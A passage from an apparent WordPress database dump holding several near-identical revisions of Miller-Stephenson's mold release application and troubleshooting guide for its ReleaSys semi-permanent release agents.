contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Application to Mold Surface</span></p>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzles sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.</li>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Re-application</span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our Technical Service Department. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely the vast given the diversity and specialization within this field. Please see our Troubleshooting guide is your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="color: #808080;"> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cure ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 14:15:28', '2016-10-24 14:15:28', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2722, 3, '2016-10-24 14:20:51', '2016-10-24 14:20:51', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.</p>\r\n<p style="text-align: justify;"><span style="font-size: 140%;"><strong><span style="text-decoration: underline;">Mold Release Application Guide:</span>\r\n</strong></span></p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span></p>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Application to Mold Surface</span></p>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Re-application</span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely the vast given the diversity and specialization within this field. Please see our Troubleshooting guide is your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="color: #808080;"> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cure ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 14:20:51', '2016-10-24 14:20:51', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2723, 3, '2016-10-24 14:22:32', '2016-10-24 14:22:32', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.</p>\r\n<p style="text-align: justify;"><span style="font-size: 140%;"><strong><span style="text-decoration: underline;">Mold Release Application Guide:</span>\r\n</strong></span></p>\r\n<p class="uppercase" style="text-align: justify;"><span style="text-decoration: underline; color: #3366ff;"><span style="font-size: 100%;">Surface-Preparation</span></span></p>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<p class="uppercase" style="text-align: justify;"><span style="text-decoration: underline; color: #3366ff;">Application to Mold Surface</span></p>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Re-application</span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely the vast given the diversity and specialization within this field. Please see our Troubleshooting guide is your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="color: #808080;"> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cure ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 14:22:32', '2016-10-24 14:22:32', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2724, 3, '2016-10-24 14:24:32', '2016-10-24 14:24:32', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.</p>\r\n<p style="text-align: justify;"></p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which 